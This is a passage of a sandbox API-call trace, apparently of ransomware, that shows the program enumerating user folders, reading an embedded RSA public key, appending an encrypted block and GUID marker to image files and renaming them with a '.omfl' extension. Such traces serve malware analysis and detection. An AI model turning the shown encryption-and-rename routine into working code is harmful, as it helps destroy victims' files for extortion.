cFileName="udSLY8K.png", cAlternateFileName="")) returned 1 [0131.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757be00 [0131.629] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.629] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\udSLY8K.png") returned=".png" [0131.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\udSLY8K.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\udsly8k.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.629] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=28144) returned 1 [0131.629] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.632] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x6dca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.632] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.633] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.633] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x6df0, lpOverlapped=0x0) returned 1 [0131.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.634] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.634] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.635] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.635] CryptHashData (hHash=0xdce3bf0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.635] CryptGetHashParam (in: hHash=0xdce3bf0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.635] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cf128 [0131.635] CryptGetHashParam (in: hHash=0xdce3bf0, dwParam=0x2, pbData=0x74cf128, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cf128, pdwDataLen=0xe00fa54) returned 1 [0131.635] GetLastError () returned 0x0 [0131.635] CryptDestroyHash (hHash=0xdce3bf0) returned 1 [0131.635] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.635] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.635] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.635] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cab8 [0131.635] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.636] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.636] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.636] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x6df0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.636] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.636] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.636] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.637] CloseHandle (hObject=0x6e4) returned 1 [0131.639] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.639] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.639] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\udSLY8K.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\udsly8k.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\udSLY8K.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\udsly8k.png.omfl")) returned 1 [0131.641] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x260a0fc0, ftCreationTime.dwHighDateTime=0x1d5d9d6, ftLastAccessTime.dwLowDateTime=0xa777c00, ftLastAccessTime.dwHighDateTime=0x1d5d988, ftLastWriteTime.dwLowDateTime=0xa777c00, ftLastWriteTime.dwHighDateTime=0x1d5d988, nFileSizeHigh=0x0, nFileSizeLow=0x117d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VO- gnx3.gif", cAlternateFileName="VO-GNX~1.GIF")) returned 1 [0131.641] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757be00 [0131.641] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.641] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VO- gnx3.gif") returned=".gif" [0131.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VO- gnx3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vo- gnx3.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.641] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=71633) returned 1 [0131.641] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.644] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x117ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.644] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.645] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.645] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x117d1, lpOverlapped=0x0) returned 1 [0131.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.646] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.647] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.647] CryptHashData (hHash=0xdce3bf0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.647] CryptGetHashParam (in: hHash=0xdce3bf0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cf128 [0131.647] CryptGetHashParam (in: hHash=0xdce3bf0, dwParam=0x2, pbData=0x74cf128, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cf128, pdwDataLen=0xe00fa54) returned 1 [0131.647] GetLastError () returned 0x0 [0131.647] CryptDestroyHash (hHash=0xdce3bf0) returned 1 [0131.647] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.647] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.647] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cab8 [0131.648] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.648] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.649] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x117d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.649] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.649] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.649] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.649] CloseHandle (hObject=0x6e4) returned 1 [0131.651] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.651] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.651] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VO- gnx3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vo- gnx3.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VO- gnx3.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vo- gnx3.gif.omfl")) returned 1 [0131.653] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x260a0fc0, ftCreationTime.dwHighDateTime=0x1d5d9d6, ftLastAccessTime.dwLowDateTime=0xa777c00, ftLastAccessTime.dwHighDateTime=0x1d5d988, ftLastWriteTime.dwLowDateTime=0xa777c00, ftLastWriteTime.dwHighDateTime=0x1d5d988, nFileSizeHigh=0x0, nFileSizeLow=0x117d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VO- gnx3.gif", cAlternateFileName="VO-GNX~1.GIF")) returned 0 [0131.653] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0131.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750caf0 | out: hHeap=0x4970000) returned 1 [0131.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0131.653] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.653] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.653] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.653] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.653] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.653] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.653] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.653] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.653] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.654] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.654] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.654] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.654] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.676] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.676] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.676] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.676] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.676] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0131.676] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.676] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.676] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.676] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.676] PathFindFileNameW (pszPath="") returned="" [0131.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x260a0fc0, ftCreationTime.dwHighDateTime=0x1d5d9d6, ftLastAccessTime.dwLowDateTime=0xa777c00, ftLastAccessTime.dwHighDateTime=0x1d5d988, ftLastWriteTime.dwLowDateTime=0xa777c00, ftLastWriteTime.dwHighDateTime=0x1d5d988, nFileSizeHigh=0x0, nFileSizeLow=0x117d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VO- gnx3.gif", cAlternateFileName="VO-GNX~1.GIF")) returned 0xffffffff [0131.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.677] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.677] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0131.677] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.677] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.677] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.677] PathFindFileNameW (pszPath="") returned="" [0131.677] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x260a0fc0, ftCreationTime.dwHighDateTime=0x1d5d9d6, ftLastAccessTime.dwLowDateTime=0xa777c00, ftLastAccessTime.dwHighDateTime=0x1d5d988, ftLastWriteTime.dwLowDateTime=0xa777c00, ftLastWriteTime.dwHighDateTime=0x1d5d988, nFileSizeHigh=0x0, nFileSizeLow=0x117d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VO- gnx3.gif", cAlternateFileName="VO-GNX~1.GIF")) returned 0xffffffff [0131.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.677] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c010 | out: hHeap=0x4970000) returned 1 [0131.677] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.677] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.678] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0131.678] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.678] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.678] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.678] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.678] PathFindFileNameW (pszPath="") returned="" [0131.678] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0131.678] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.678] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.678] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0131.678] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.678] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0131.678] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0131.679] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.679] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.679] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 